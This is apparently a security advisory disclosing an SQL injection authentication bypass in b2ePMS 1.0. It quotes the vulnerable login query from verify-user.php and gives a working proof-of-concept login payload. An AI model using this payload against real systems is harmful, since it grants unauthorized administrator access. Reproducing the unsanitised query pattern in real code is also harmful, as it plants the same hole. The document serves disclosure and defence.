b2ePMS 1.0 Authentication Bypass Vulnerability

Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor Information:

"b2ePMS stands for Browser to Email Phone Message System. It is intended to replace the standard 
paper/carbon phone message slips commonly used in offices, with the capability of sending the message
 via a web browser form directly to the recipients inbox."

Vendor URI: https://developer.berlios.de/projects/b2epms/


Issue: SQL Injection, Authentication Bypass

Risk level: High

=> The remote attacker has the possibility to execute arbitrary SQL Code.

=> The remote attacker is able to bypass the user authentication.

In verify-user.php, line 20:


$sql = mysql_query("SELECT * FROM b2epms_user WHERE username='$username' AND user_passwd='$admin_passwd' AND activated='1' AND user_level='2'");
$login_check = mysql_num_rows($sql);
if($login_check > 0){
  while($row = mysql_fetch_array($sql)){
  foreach( $row AS $key => $val ){
    $$key = stripslashes( $val );
    // Register session variables!
    $_SESSION['userid'] = $user_level;
    mysql_query("UPDATE b2epms_user SET login_date=now() WHERE userid='$userid'"); $url = "Location: admin.php";


Exploit / Proof Of Concept:

Perform a login with the following data:

Username: admin' OR '1='1
Password: x


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b2ePMS 1.0 Authentication Bypass Vulnerability

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